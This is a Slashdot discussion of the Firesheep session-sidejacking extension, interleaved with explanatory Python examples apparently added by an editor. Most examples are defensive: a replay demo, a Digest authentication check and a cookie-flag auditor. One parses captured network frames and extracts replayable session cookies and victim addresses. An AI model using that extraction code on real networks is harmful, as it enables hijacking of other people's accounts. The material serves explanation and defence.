
Firefox Extension Makes Social-Network ID Spoofing Trivial 185

Posted by timothy
from the plausible-deniability-for-farmville dept.
Orome1 writes "A simple-to-use Firefox plugin presented yesterday at Toorcon in San Diego has hit the security world with the realization that squabbles about Facebook's changing privacy settings and various privacy breaches simply miss the point. 'When it comes to user privacy, SSL is the elephant in the room,' said Eric Butler, the developer of the extension in question, dubbed Firesheep. By installing and running it, anyone can 'sniff out' the unencrypted HTTP sessions currently allowing users on that network segment to access social networks, online services and other websites requiring a login, and simply hijack them and impersonate the user."
  • Illegal? (Score:5, Informative)

    by Anonymous Coward on Monday October 25, 2010 @08:09AM (#34010574)

    I don't dispute the author's work or goals (I've been using SSH tunneling on public WiFi for years to prevent just this) but he should have mentioned that clicking on information you gathered (and logging in as another user without their consent) is very likely against federal laws in the US (and likely most other locations). Just gathering this information can likely be argued to be illegal as well (wiretapping?)

    So be careful where you click..

    • Leaving aside md5 cracks (use another algo if you want):

      md5 the password with Javascript on the client end before sending it. Then un-md5 it with PHP on the server.

      Plenty of security-conscious CMS's have been doing this before Mark Z even thought of an electronic facebook.

      • Re: (Score:2, Insightful)

        by gmurray (927668)
        md5 is a hash algorithm. How would that help? If someone can snoop your md5 hash they can replay it to gain access to the server, and then change your password (provided the server doesn't provide a challenge to perform this action). All md5 does is protect your actual password, which is small protection if your account can be illicitly accessed anyway. None of these services send a password in plaintext (hopefully). That isn't the issue. The issue is that they use replayable tokens and don't use encryption to send them on the wire.
        • by gmurray (927668) on Monday October 25, 2010 @10:10AM (#34011588)
          furthermore the entire usefulness of md5 is that you can't un-md5 it ;-)
          • by ghjm (8918)

            Or, depending on who you are, the usefulness might be that no-one else can.

        • by Culture20 (968837) on Monday October 25, 2010 @10:32AM (#34011912)

          md5 is a hash algorithm. How would that help? If someone can snoop your md5 hash they can replay it to gain access to the server, and then change your password (provided the server doesn't provide a challenge to perform this action). All md5 does is protect your actual password, which is small protection if your account can be illicitly accessed anyway. None of these services send a password in plaintext (hopefully). That isn't the issue. The issue is that they use replayable tokens and don't use encryption to send them on the wire.

          Well, then md5 the hash. It's just like using triple-DES or double rot-13 (one of the two, or maybe a happy middle-ground). ;)

      • Re: (Score:2, Informative)

        by ogapo (1420605)
        I think you may not understand how a cryptographic hash works. In the scheme you are describing, the password is typically hashed on the client side (along with some value specified by the server which changes every time). When the server gets the hash, it hashes the password (as stored in the DB and possibly also hashed) along with the same value and compares the result. Regardless, what this plugin does is not steal passwords, but simply looks for authenticated credentials (usually cookies). See, once yo
        • by Compaqt (1758360)

          Did I really say un-md5 ?!! Sorry, I meant "compare the hash sent by the client to that saved in the DB".

          Even so, this technique uses cookies, and not the password or hash. (Note to self: Read the articles!)

          Typo3 is one CMS that you can set to check the incoming IP and make sure it's the same as the IP that originally authenticated.

          Drupal 6 is abysmal in that it doesn't even use salt; probably half the passwords in table users are likely to be in an md5 database somewhere.

          • by shmlco (594907)

            "Typo3 is one CMS that you can set to check the incoming IP and make sure it's the same as the IP that originally authenticated."

            If you snatched someone's cookies over free WiFi at a coffeehouse, you probably HAVE the same IP address as they do, since all the server sees is the coffeehouse's gateway IP address.

            IOW, that won't help either.

            • by hairyfeet (841228)

              Plus I'd add that tying ANYTHING, from authentication to bans, to an IP address given that we are running out of IPV4 and most likely will be seeing more and more bigger and bigger NATs is a bad idea to beat ALL bad ideas.

              While I'm not into social junk and therefore don't have a clue how they authenticate (but really not surprised if it's easily hacked, considering the amount of spam I've gotten from friends that use FB) tying ANYTHING into IP before we've had the switch to IPV6 is just a universally BAD i

      • Re: (Score:2, Insightful)

        by Anonymous Coward

        This won't work as the extension sniffs out cookies, not passwords.

        Even then, this won't help as the extension could be changed to sniff the hashed password (it's just send as plain text over HTTP), and send that hash itself.

        • "If you snatched someone's cookies over free WiFi at a coffeehouse, you probably HAVE the same IP address as they do, since all the server sees is the coffeehouse's gateway IP address."

          "Even then, this won't help as the extension could be changed to sniff the hashed password (it's just send as plain text over HTTP), and send that hash itself."

          All this talk of sniffing cookies and hash has got my stomach rumbling.

          Enough already.

      • by jwietelmann (1220240) on Monday October 25, 2010 @10:32AM (#34011920)

        Hash = 1-way crypto

        The only way to "un-md5" anything is to crack it. Also, I'm not sure you actually put any real thought into this.

        Since it's best practice to store only password hashes (and not the passwords themselves) in your database (or whatever), your process is apparently:

        1. Client md5's the password, sends it to server
        2. Server "un-md5"s the password (let's say for argument's sake that this makes perfect sense)
        3. Server md5's the un-md5'd password
        4. Server checks hash against user's hash in the database
      • Re: (Score:2, Informative)

        by Mashiara (5631)

        You are missing the point.

        The problem is not reading the password as plaintext from the cookie (now that would be monumentally stupid design) but that since the cookie equals valid session authentication copying the cookie equals session hijacking (or sidejacking since the original cookie is still there on the original users machine).

      • Re: (Score:3, Funny)

        by PatPending (953482)

        md5 the password with Javascript on the client end before sending it. Then un-md5 it with PHP on the server.

        Or use quad-ROT13 instead.

      • Leaving aside md5 cracks, WTF do you mean by "un-md5 it"? You can't do that!

      • by Compaqt (1758360)

        Please somebody mod my original post [slashdot.org] as Funny and not Informative to avoid future PHP-Nukes.

        What you actually need to do at the very least is:

        1. md5 [slashdot.org] (or another algo) with Javascript on the client and compare that hash to the one saved in the DB. If the password is stored in cleartext (which it shouldn't be, but sometimes external systems are out of your control), md5 [php.net] it with PHP.

        2. Some people use SSL on the login page.

        3. But this attack shows crackers just intercepting and replaying the creds. Discouraging
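The subthread above argues three things at once: a client-side md5(password) is just another replayable token, a copied session cookie is enough to impersonate the user, and binding the session to the client IP does nothing when victim and attacker share the cafe's NAT address. The following is an added example written for this page, not code from Firesheep or from any CMS named in the thread. Everything in it (the user table, the "correct horse" password, the 203.0.113.10 gateway address) is constructed; it models the server side and what a passive sniffer on the same WiFi would capture and resend.

```python
import hashlib
import secrets
from http.cookies import SimpleCookie
from typing import Dict, Optional

# Constructed user table: the server stores md5(password), as the CMSs in the
# thread do. Weak by today's standards; kept only to mirror the discussion.
USERS = {"alice": hashlib.md5(b"correct horse").hexdigest()}
SESSIONS: Dict[str, Dict[str, str]] = {}   # session id -> {"user": ..., "ip": ...}


def login(form_body: str, client_ip: str) -> Optional[str]:
    """Server side of the 'hash it in JavaScript' scheme: the client POSTs
    user=...&pwhash=md5(password) over plain HTTP and the server compares the
    hash to the stored one. Returns a fresh session id on success, else None."""
    fields = dict(part.split("=", 1) for part in form_body.split("&") if "=" in part)
    user, pwhash = fields.get("user", ""), fields.get("pwhash", "")
    stored = USERS.get(user)
    if stored is None or not secrets.compare_digest(stored, pwhash):
        return None
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "ip": client_ip}
    return sid


def authenticated_user(cookie_header: str, client_ip: str,
                       bind_ip: bool = False) -> Optional[str]:
    """Resolve a request's Cookie header to a user. With bind_ip the server
    also insists the request comes from the IP that logged in (the Typo3-style
    option mentioned in the thread)."""
    jar = SimpleCookie(cookie_header)
    if "sid" not in jar:
        return None
    session = SESSIONS.get(jar["sid"].value)
    if session is None:
        return None
    if bind_ip and session["ip"] != client_ip:
        return None
    return session["user"]


def run_scenario() -> Dict[str, bool]:
    """Replays what a sniffer on the cafe WiFi sees. Victim and attacker sit
    behind the same NAT, so the server sees one source address for both."""
    nat_ip = "203.0.113.10"      # constructed: the cafe's gateway address
    remote_ip = "198.51.100.7"   # constructed: an attacker replaying from elsewhere

    # 1. The victim logs in over plain HTTP; the sniffer records the POST body.
    victim_body = "user=alice&pwhash=" + hashlib.md5(b"correct horse").hexdigest()
    victim_sid = login(victim_body, nat_ip)

    # 2. Hash replay: the attacker never learns the password and does not need it.
    attacker_sid = login(victim_body, nat_ip)

    # 3. Sidejacking: the victim's next request carries the cookie; the attacker copies it.
    sniffed_cookie = f"sid={victim_sid}"
    return {
        "hash_replay_works": attacker_sid is not None,
        "cookie_replay_works": authenticated_user(sniffed_cookie, nat_ip) == "alice",
        "ip_binding_same_nat_still_works": authenticated_user(sniffed_cookie, nat_ip, bind_ip=True) == "alice",
        "ip_binding_blocks_remote": authenticated_user(sniffed_cookie, remote_ip, bind_ip=True) is None,
    }


if __name__ == "__main__":
    for check, outcome in run_scenario().items():
        print(f"{check}: {outcome}")
```

The only line the attacker needs from the capture is the cookie; the hash replay is included to show that moving the hashing into the browser changes nothing about the token being static. IP binding rejects the remote replay but not the one that matters here, since the whole coffeehouse presents the same address.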

  • First haxx! (Score:4, Funny)

    by Anonymous Coward on Monday October 25, 2010 @08:09AM (#34010576)

    Ha ha, anon is pwned :D

    • by Anonymous Coward on Monday October 25, 2010 @08:12AM (#34010590)

      WTF !, this guy is logged in as me !

      • My comments (Score:3, Funny)

        by formfeed (703859)
        I'd like to declare that all comments under my user name that are controversial or could get me in trouble were made by someone else.

        Someone, who obviously must have sniffed out my wireless cookies. -Shame on them.

  • by buchner.johannes (1139593) on Monday October 25, 2010 @08:10AM (#34010578) Homepage Journal

    here: http://codebutler.com/firesheep [codebutler.com]

    They apparently call it "sidejacking", i.e. sniffing other users' cookies from a wifi, and using them. Not new, but made user-friendly.

    • the realization that squabbles about Facebook's changing privacy settings and various privacy breaches simply miss the point.

      I'm much more concerned about that than someone on my network stealing my password. If they're on my network, they could steal my password? This is not new, nor is it news. The number of people on the internet out to get your personal information is much, much higher than the number of people on your network out to do the same.

      This is just a high-tech version of this:

      'When it comes to user privacy, other people are the elephant in the room,' said SudoGhost, random douchebag author of the post in question, dubbed 'Other People in the Room'. By being in the room and watching the screen/keyboard, anyone can 'sniff out' not only the unencrypted HTTP sessions, but virtually any keystroke, allowing your mom to access social networks, online services and other websites requiring a login, and simply hijack them and find out where you really were Saturday night."

    • by DrYak (748999) on Monday October 25, 2010 @08:53AM (#34010814) Homepage

      Kudos to FaceBook and most other networks for NOT using encryption for anything but the log in, making such hacks possible !
      I know that HTTPS would put some stress on the servers, specially with something as big as Facebook.
      But, come on. Social networks have become so important for some people that the risks of vandalism/identity spoofing/defamation, etc. are significant and would benefit from some more protection.

      • Re: (Score:3, Interesting)

        by FrostDust (1009075)

        Do they have any guarantee that all of their users have a browser that supports HTTPS?

        To Facebook, it's better to allow access to as many users as possible, than lock some out in the name of security.

        • by Confusador (1783468) on Monday October 25, 2010 @10:21AM (#34011734)

          There's a world of difference between having a fallback for those who can't use the secure site (with a warning that it is not secure, even) and not having an option for those who can.

      • You don't even need HTTPS. HTTP already supports authentication mechanisms. If we'd use digest authentication for logins then we wouldn't have to bother with cookies at all. Unfortunately, there's no way to make a pretty login page for digest (or plain) authentication. The browser pops up a username/password dialog instead. Therefore, web sites avoid it and opt instead for the mess of cookies and all their security issues.
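The comment above proposes HTTP Digest authentication as a cookie-free alternative. What makes Digest resist the replay Firesheep performs is the server nonce plus the nonce-count: a captured Authorization header is only valid once, and only for the method and URI it was computed over. The block below is an added example for this page, not the thread's or any server's code; it implements the RFC 2617 computation with qop=auth and a constructed realm, user and password, and walks through a capture, a replay, a reuse against a different URI, and a legitimate follow-up request.

```python
import hashlib
import hmac
import secrets
from typing import Dict


def _md5(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def client_response(user: str, realm: str, password: str, method: str, uri: str,
                    nonce: str, nc: str, cnonce: str) -> str:
    """RFC 2617 Digest, qop=auth: response = MD5(HA1:nonce:nc:cnonce:auth:HA2)."""
    ha1 = _md5(f"{user}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:auth:{ha2}")


class DigestServer:
    """Minimal server side. Stores HA1 per user (never the password) and the
    highest nonce-count accepted per nonce; that counter is what defeats replay."""

    def __init__(self, realm: str, users: Dict[str, str]):
        self.realm = realm
        self.ha1 = {u: _md5(f"{u}:{realm}:{p}") for u, p in users.items()}
        self.nonce_count: Dict[str, int] = {}

    def challenge(self) -> str:
        """Nonce the server would put in its WWW-Authenticate header."""
        nonce = secrets.token_hex(16)
        self.nonce_count[nonce] = 0
        return nonce

    def verify(self, auth: Dict[str, str]) -> bool:
        """auth holds the fields of the client's Authorization header."""
        nonce = auth.get("nonce", "")
        if nonce not in self.nonce_count:
            return False                    # unknown or expired nonce
        nc = int(auth.get("nc", "0"), 16)
        if nc <= self.nonce_count[nonce]:
            return False                    # same (nonce, nc) already used: a replay
        ha1 = self.ha1.get(auth.get("username", ""))
        if ha1 is None:
            return False
        ha2 = _md5(f"{auth['method']}:{auth['uri']}")
        expected = _md5(f"{ha1}:{nonce}:{auth['nc']}:{auth['cnonce']}:auth:{ha2}")
        if not hmac.compare_digest(expected, auth.get("response", "")):
            return False                    # wrong password, or header reused for another URI
        self.nonce_count[nonce] = nc
        return True


def run_scenario() -> Dict[str, bool]:
    server = DigestServer("example.com", {"alice": "correct horse"})   # constructed
    nonce = server.challenge()

    def authorization(uri: str, nc: str) -> Dict[str, str]:
        cnonce = secrets.token_hex(8)
        return {"username": "alice", "method": "GET", "uri": uri, "nonce": nonce,
                "nc": nc, "cnonce": cnonce,
                "response": client_response("alice", "example.com", "correct horse",
                                            "GET", uri, nonce, nc, cnonce)}

    captured = authorization("/inbox", "00000001")      # what the sniffer sees on the wire
    first_ok = server.verify(captured)
    replay_ok = server.verify(dict(captured))           # attacker resends it verbatim
    reused_ok = server.verify(dict(captured, uri="/admin", nc="00000002"))  # bumps nc, wrong HA2
    next_ok = server.verify(authorization("/inbox", "00000002"))            # real client continues
    return {"first_request_accepted": first_ok, "replay_rejected": not replay_ok,
            "reuse_for_other_uri_rejected": not reused_ok, "fresh_nc_accepted": next_ok}


if __name__ == "__main__":
    print(run_scenario())
```

Two caveats a practitioner would want alongside this. Digest authenticates the request only; the page body, the username and everything else still cross the wire in the clear, and the captured response can be attacked offline with a dictionary since nonce and cnonce are visible. And the stored HA1 is password-equivalent for that realm, so a leaked user table gives the same replay the thread worries about.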

    • by thomst (1640045) on Monday October 25, 2010 @09:11AM (#34011002) Homepage

      here: http://codebutler.com/firesheep [codebutler.com].

      Steve Manuel of TechCrunch claims that the Force-TLS 2.0 [mozilla.org] Firefox extension can defeat Firesheep. (You have to configure it manually for each site you want to protect, though, so it's somewhat of a PITA.)

      Another option is the HTTPS Everywhere [eff.org] Firefox extension from EFF and the Tor Project. Although HTTPS Everywhere has a predefined ruleset that includes some of the most popular Web sites, you'll still have to write your own ruleset [eff.org] for any site not on their default list.

    • by AK Marc (707885)
      I'll call it "freejacking" in honor of the best movie Emilio Estevez or Mick Jagger were ever in. Which was, coincidentally, the worst movie Anthony Hopkins was ever in.
  • and this is news ? (Score:3, Insightful)

    by Torvac (691504) on Monday October 25, 2010 @08:12AM (#34010586)
    someone in the same network sniffing your unencrypted traffic is facebooks fault ? or the fact that someone made a UI to do it for dummies ?
    • by Anonymous Coward on Monday October 25, 2010 @08:15AM (#34010604)

      the fact that it's unencrypted is facebooks fault, it's not hard to push everything through HTTPS, there's no excuse these days

      • Re: (Score:3, Informative)

        While I'm inclined to agree that any remotely commercial website should offer and default to encrypted transfers, it also serves you right if you use a service that doesn't encrypt everything. Using a service that doesn't at least offer you the option of encryption is akin to driving a car that you know has defective brakes (ha, car analogy!). If shit goes badly and you knew better, you've no one to blame but yourself. If you didn't know better, it's your own fault for not educating yourself about such b

    • by Ephemeriis (315124) on Monday October 25, 2010 @08:25AM (#34010652)

      someone in the same network sniffing your unencrypted traffic is facebooks fault ?
      or the fact that someone made a UI to do it for dummies ?

      The fact that it is unencrypted is, yes.

      • by Afty0r (263037)

        The fact that it is unencrypted is, yes.

        Wait, it's Facebooks' fault that you chose to browse their site unencrypted?

        You have the choice - if you visit https://facebook.com/ [facebook.com] it will let you run your entire session on the site in https. They obviously support SSL for those who want it... I fail to see how it's their fault?

        • by Aqualung812 (959532) on Monday October 25, 2010 @10:27AM (#34011828)

          You have the choice - if you visit https://facebook.com/ [facebook.com] it will let you run your entire session on the site in https. They obviously support SSL for those who want it... I fail to see how it's their fault?

          Follow the link you attached. Log into Facebook. Click the Facebook icon on that page to return to your home page, or click on a link to a fan page you have, or click on a link to a friend's page. You just went from SSL to HTTP. They make it hard to STAY on SSL, even if you go through the work of going there manually.

          • Re: (Score:2, Informative)

            by KBJorgensen (1819456)
            The Chrome extension KB SSL Enforcer automatically redirects you to SSL every time you visit Facebook (and other sites) and changes all links to point to SSL. Although I do agree that they should just use SSL by default on a site with so much personal info. Disclaimer: I made this extension.
        • Should be encrypted by default. Should not be an unencrypted option.
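The Force-TLS, KB SSL Enforcer and HTTPS Everywhere extensions mentioned above all work around the same two server-side omissions that Aqualung812's walk-through exposes: a session cookie set without the Secure attribute, which the browser will happily send on the next http:// link Facebook hands it, and no Strict-Transport-Security header (the header Force-TLS enforced on the client and which became HSTS) telling the browser never to go back to plaintext. The following is an added example for this page, not code from any of those extensions or sites; it audits a raw HTTP response for those two conditions. Both sample responses are constructed.

```python
from http.cookies import SimpleCookie
from typing import Iterable, List


def audit_response(raw_response: str, session_cookies: Iterable[str]) -> List[str]:
    """Scan raw HTTP response headers for what lets an authenticated session
    fall back onto plain HTTP: session cookies without Secure (and HttpOnly)
    and a missing Strict-Transport-Security header. Returns human-readable findings."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:           # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))

    findings = []
    if not any(name == "strict-transport-security" for name, _ in headers):
        findings.append("no Strict-Transport-Security: an http:// link or bookmark "
                        "drops the browser back to plaintext")

    wanted = set(session_cookies)
    for name, value in headers:
        if name != "set-cookie":
            continue
        jar = SimpleCookie()
        jar.load(value)                            # one Set-Cookie header per line
        for cookie, morsel in jar.items():
            if cookie not in wanted:
                continue                           # e.g. a language preference: not worth stealing
            if not morsel["secure"]:
                findings.append(f"{cookie}: no Secure flag, sent on the next http:// request")
            if not morsel["httponly"]:
                findings.append(f"{cookie}: no HttpOnly flag, readable by injected script")
    return findings


# Constructed: a login response served over HTTPS that still leaves the session
# exposed, and the same response with the missing attributes added.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: sid=7f3a9c1e; Path=/\r\n"
    "Set-Cookie: lang=en; Path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>...</html>"
)
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "Set-Cookie: sid=7f3a9c1e; Path=/; Secure; HttpOnly\r\n"
    "Set-Cookie: lang=en; Path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>...</html>"
)


if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response(raw, {"sid"}) or ["ok"])
```

With Secure set, a sidejacker on the cafe WiFi never sees the cookie, because the browser refuses to attach it to plaintext requests even when the site links to http:// pages; HSTS removes those plaintext requests altogether once the browser has seen the header once. HttpOnly is unrelated to Firesheep but is the attribute one checks in the same pass.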

    • Why is it anyone's "fault?" Who cares? It's Facebook for science's sake! It's all just pictures of people's kids and crap, it doesn't matter at all if someone logs on as me and posts nonsense!

      [/perspective]

      • by Culture20 (968837)

        Why is it anyone's "fault?" Who cares? It's Facebook for science's sake! It's all just pictures of people's kids and crap*, it doesn't matter at all if someone logs on as me and posts nonsense!

        [/perspective]

        * that people have a general sense of being true. Great mischief can be done with data gathered, or accounts used/people impersonated.

    • The news is that still hardly anyone understands SSL or what it is for.

      People like to see that little lock sign (or whatever obscure message their browser displays) when they log into their bank. But I sincerely doubt that the great majority of people have any idea that things like e-mail transactions can be routed over SSL or why that might be a good (i.e., critically important) idea.

      Just scan your local neighborhood and look at (for an analogous example) how many people are still using WEP and thinking th

      • Email (IMAPS/SMTPS to your server) over SSL is nice but ultimately irrelevant, as you don't know if the rest of the path is encrypted. Only OpenPGP is safe.

        WEP is similar; it's not a real protection, but stops the random kid trying to use your 'net to download stuff.

  • Why no encryption? (Score:4, Interesting)

    by AHuxley (892839) on Monday October 25, 2010 @08:19AM (#34010626) Homepage Journal
    What is the cpu use and heat of the user base requesting and using ssl vs this bad news?
    "Double-click on someone, and you're instantly logged in as them."
    What's the extra use, 15-20%? vs unencrypted HTTP.
    Would ssl being left off allow creative law enforcement uses?
  • Plugin-rebuttal.

  • What permissions do you need for this? Do you have to be the owner of the network in order to sniff things out in this manner? Or is it possible for me to steal accounts off a public network?

    If its the former, then there's nothing too special - sniffers can do that already.

    If its the latter, then its time to put on the tinfoil hats.
    • Re: (Score:2, Informative)

      by pinkeen (1804300)
      It is wifi sniffing. The data is in the air. All you need is to be in range of the client's radio transmissions. If the network is encrypted then you need the WEP/WPA(2) key.
    • by mbone (558574) on Monday October 25, 2010 @09:08AM (#34010960)

      What permissions do you need for this? Do you have to be the owner of the network in order to sniff things out in this manner? Or is it possible for me to steal accounts off a public network?

      None, no, and most emphatically yes.

    • by Stray7Xi (698337) on Monday October 25, 2010 @10:28AM (#34011846)

      What permissions do you need for this? Do you have to be the owner of the network in order to sniff things out in this manner? Or is it possible for me to steal accounts off a public network?

      You need to be administrator to place your network card into promiscuous mode [wikipedia.org] or rfmon for wireless.

      So in a public wifi network you're screwed. In a public ethernet network it depends if it's a switched or hubbed network. But even in a switched network you could be vulnerable to this via ARP poisoning.

      The takeaway is what we've known for decades, if you want private communications use encryption.

  • squabbles about Facebook's changing privacy settings and various privacy breaches simply miss the point.

    Another point does not "miss the point".

    Transport security != corporate marketing of private data

  • by SpinningCone (1278698) on Monday October 25, 2010 @08:38AM (#34010708)

    I used to do sniffing and stuff like this a couple years ago and the biggest hurdle was finding a wireless adapter which would allow promiscuous mode. aircrack sells one that comes with 1st party drivers to allow sniffing. I used a linksys usb adapter since there were 3rd party drivers that allowed it.

    unless something has changed I thought most wireless drivers didn't support promiscuous mode for sniffing.

  • How does it work? (Score:3, Interesting)

    by pinkeen (1804300) on Monday October 25, 2010 @08:39AM (#34010712) Homepage
    The article is extremely light on details. The plugin's page [codebutler.com] doesn't tell much either. I'm curious how it captures the WiFi packets. Is it possible to capture them when not in monitor mode?
    • Re:How does it work? (Score:4, Informative)

      by will_die (586523) on Monday October 25, 2010 @09:12AM (#34011008) Homepage
      You first need to install WinPcap [winpcap.org]; this is the program that does the actual work. You then log on to the wifi, using a password if required, and the program starts looking for known cookies. If it finds them it captures the info and gives you a nice user-friendly way of using them.
      It can capture the wifi traffic since anyone within range of the transmissions can capture it. If you are not monitoring when the signals go out, you cannot capture them.
      • Re: (Score:3, Interesting)

        by pinkeen (1804300)
        That wasn't my question. When in monitor (promiscuous) mode, the adapter can capture but cannot associate and give you an internet connection. So, when you capture packets you need another wlan adapter or ethernet NIC for your internet connection to actually use these stolen cookies. There's no mention of it on the site. So I wondered whether maybe the plugin does some magic and captures packets while the same adapter is associated with an AP.
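Whatever the capture library hands over (will_die's answer above puts that work in WinPcap), the extension's own job is the part below: walk each frame down to the TCP payload, pick out plain-HTTP requests to hosts it has a handler for, and collect that host's full set of session cookies along with the victim's address. This is an added example written for this page, not Firesheep's source. It assumes Ethernet-framed capture as pcap delivers it for an associated interface, takes no position on monitor versus promiscuous mode, and the handler table (the hosts and the cookie names c_user, xs and sid) is constructed for illustration rather than copied from the extension. The test frame is built inline with zeroed checksums, which the parser ignores.

```python
import socket
import struct
from http.cookies import SimpleCookie
from typing import Dict, Optional, Set, Tuple

ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6

# Constructed handler table: which cookie names together form a replayable
# session for a given host. Illustrative only, not Firesheep's real handler list.
HANDLERS: Dict[str, Set[str]] = {
    "www.example.com": {"sid"},
    "social.example.net": {"c_user", "xs"},
}


def tcp_segment(frame: bytes) -> Optional[Tuple[str, int, bytes]]:
    """Walk Ethernet -> IPv4 -> TCP. Returns (src_ip, dst_port, payload), or
    None for anything else (ARP, IPv6, UDP, a truncated frame)."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    if ip[0] >> 4 != 4 or ihl < 20 or ip[9] != IPPROTO_TCP or len(ip) < total_len:
        return None
    tcp = ip[ihl:total_len]
    if len(tcp) < 20:
        return None
    dst_port = struct.unpack("!H", tcp[2:4])[0]
    data_offset = (tcp[12] >> 4) * 4
    return socket.inet_ntoa(ip[12:16]), dst_port, tcp[data_offset:]


def http_request_headers(payload: bytes) -> Optional[Dict[str, str]]:
    """Parse the start of an HTTP/1.x request into lower-cased headers."""
    text = payload.decode("iso-8859-1")            # never raises; bytes map 1:1
    lines = text.split("\r\n\r\n", 1)[0].split("\r\n")
    request_line = lines[0].split(" ")
    if len(request_line) != 3 or not request_line[2].startswith("HTTP/1."):
        return None
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def sidejack_candidate(frame: bytes) -> Optional[dict]:
    """Per captured frame: plain-HTTP request, a host we have a handler for,
    and the complete set of that host's session cookies. Anything less is
    not enough to impersonate the user, so it is dropped."""
    segment = tcp_segment(frame)
    if segment is None:
        return None
    src_ip, dst_port, payload = segment
    if dst_port != 80 or not payload:              # 443 is opaque to a sniffer
        return None
    headers = http_request_headers(payload)
    if not headers or "host" not in headers or "cookie" not in headers:
        return None
    host = headers["host"].split(":")[0].lower()
    wanted = HANDLERS.get(host)
    if not wanted:
        return None
    jar = SimpleCookie(headers["cookie"])
    found = {name: jar[name].value for name in jar if name in wanted}
    if set(found) != wanted:
        return None
    return {"victim": src_ip, "host": host, "cookies": found}


def build_frame(src_ip: str, dst_ip: str, dst_port: int, payload: bytes) -> bytes:
    """Constructed Ethernet/IPv4/TCP frame for testing; checksums left at zero."""
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + struct.pack("!H", ETHERTYPE_IPV4)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0x4000, 64,
                     IPPROTO_TCP, 0, socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    tcp = struct.pack("!HHIIBBHHH", 40123, dst_port, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


# Constructed: what a logged-in victim's browser sends on an open network.
VICTIM_REQUEST = (b"GET /home.php HTTP/1.1\r\n"
                  b"Host: social.example.net\r\n"
                  b"Cookie: datr=abc; c_user=100001; xs=9f2c1a\r\n\r\n")


if __name__ == "__main__":
    print(sidejack_candidate(build_frame("192.168.1.23", "203.0.113.50", 80, VICTIM_REQUEST)))
```

The returned dictionary is all a replay needs: set those cookies on a fresh browser profile and request the same host. DJ Rubbie's suggestion further down, running a promiscuous tcpdump while using a mobile app, amounts to feeding the app's traffic through exactly this kind of check; if a cookie or token comes out, the app is no safer than the web site.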
  • by Viol8 (599362) on Monday October 25, 2010 @08:46AM (#34010766)

    ... that the bleating masses who so readily rushed to put their entire lives and details on social networking sites despite all the warnings are now running around shouting at all the chickens that are coming home to roost?

    For the rest of us with some common sense this is just hilarious.

    • by betterunixthanunix (980855) on Monday October 25, 2010 @08:55AM (#34010846)
      To be fair, most of those people do not actually care. There is a small minority of users who do care, but for some reason continue to use those websites; the rest just want to follow the crowd without stopping to question anything.
    • by beh (4759) *

      For the rest of us with some common sense this is just hilarious.

      You're making a bad judgment here - there is a lack of common sense in both IT geeks like 'us' and normal users (anyone outside IT).

      The issue with facebook and security has nothing to do with common sense per se, but with IT training. You and I may know a few things about security, which may lead us to accept some things, but reject others.
      People outside IT do not have this type of training, nor would it be easy to bestow it on them. It IS the kind of people (the 90+% of the planet) which can not easily fo

    • I hate to break it to you but the intersection of the set of people whom you consider to be the "bleating masses who so readily rushed to put their entire lives and details on social networking sites" and the set of people who read about the opensource project known as firesheep AND are really concerned about someone packet sniffing on their own network and then doing something malicious with it (just logging in is likely completely illegal) is probably incredibly small so no one is running around shouting

      • by Viol8 (599362)

        Well for a start mixing metaphors doesn't mean just using 2 in the same sentence and secondly if you think living your life on a social networking site is "frollicking in the sun" then I'd suggest you get out more my friend.

      • by mcgrew (92797) *

        those dang sheep finally got their comeuppance for frolicking in the sun instead of hunkering down underground and now are all whaling

        Whaling is against international treaty these days, haven't you heard? And what does hunting whales have to do with facebook, anyway?

        • The Council of Wool, being the governing body of Sheep, never signed onto that treaty due to the long history of conflict in sheep-whale relations.

          Good catch ;)

    • by mbone (558574)

      Look, I know plenty of people who use Facebook and the like basically as a means to post blogs (or, as "twitter with 420 character posts"). They don't put up anything personally sensitive, but they would still be pissed off if someone stole their info and started putting up posts in support of neo-Nazi child pornography or whatever.

    • by Klinky (636952)

      This is session cookie hijacking, it could be used to spoof your Slashdot credentials just as much as someone's Facebook account. Someone just put "Social Network" in the headline to make it seem more hip. Cookie spoofing has been known since the invention of Cookies.

  • Cookie theft (Score:5, Insightful)

    by Securityemo (1407943) on Monday October 25, 2010 @08:54AM (#34010828) Journal
    It's "just" WiFi cookie theft. You can do that easily with wireshark and copy/paste, this just makes it a bit faster. The problem lies in session cookies, and this is a problem known for what, almost a decade now?
  • It is the lack of SSL that is the problem here, and it is the non-use of SSL that 'is the elephant in the room,'

    This has been going on for a long time now - attend a NANOG meeting and use unencrypted logins, and you may well see your password on the screen by the end of the meeting - the white hat guys routinely sniff the wireless for passwords.

  • But will it... (Score:2, Interesting)

    by koterica (981373)
    run (on) linux? Apparently not. I guess I won't be using it.
  • It seems that this is most concerning for those logging in while using public networks (such as accessing with a cafe's WiFi).

    So this leads me to ask if I am safer when using the Facebook/Amazon/eBay app rather than the mobile browser. Is the security of the iPhone or android apps better than the web security for Facebook?
    Or can I make my access of these sites more secure myself somehow?
    • by DJ Rubbie (621940)

